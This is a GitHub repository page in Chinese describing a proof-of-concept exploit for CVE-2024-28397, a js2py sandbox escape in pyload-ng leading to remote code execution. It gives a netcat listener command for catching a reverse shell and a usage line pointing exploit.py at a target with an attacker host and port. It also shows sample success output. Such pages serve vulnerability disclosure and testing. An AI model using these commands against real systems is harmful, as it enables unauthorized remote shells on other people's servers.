ExtremeUday/Remote-Code-Execution-CVE-2024-28397-pyload-ng-js2py-

GitHub: ExtremeUday/Remote-Code-Execution-CVE-2024-28397-pyload-ng-js2py-

针对 CVE-2024-28397 的 PoC exploit,利用 pyload-ng 中 js2py 沙盒逃逸实现远程代码执行。

Stars: 0 | Forks: 0

# 远程代码执行 – CVE-2024-28397 (pyload-ng / js2py) 本仓库包含一个针对 **CVE-2024-28397** 的**概念验证** exploit,该漏洞是由于 **pyload-ng** 不安全地使用了 **js2py** 而导致的远程代码执行漏洞。 ## 漏洞详情 - **CVE ID:** [CVE-2024-28397](https://nvd.nist.gov/vuln/detail/CVE-2024-28397) - **组件:** `pyload-ng` 中的 `js2py` - **影响:** 远程代码执行 (RCE) - **攻击向量:** 恶意的 JS payload 逃逸出 js2py 沙盒并执行任意系统命令。 ## 环境要求与设置 你需要 **Python 3.x**、`requests` 库以及用于接收反弹 shell 的 `netcat`。 - 目标 → 存在漏洞的 pyload-ng 实例,且其 /run_code 端点可被访问 ## 监听端 → 在运行 exploit 之前启动: **nc -lvnp 4444** ## 使用方法: **python3 exploit.py -url http://target.com -lhost YOUR_IP -lport 4444 -user attacker -passwd attacker123** ## 示例输出: - [+] 注册成功! - [+] 登录成功 - [+] exploit 执行成功
标签:CISA项目, Python, RCE, 威胁模拟, 安全, 无后门, 超时处理, 逆向工具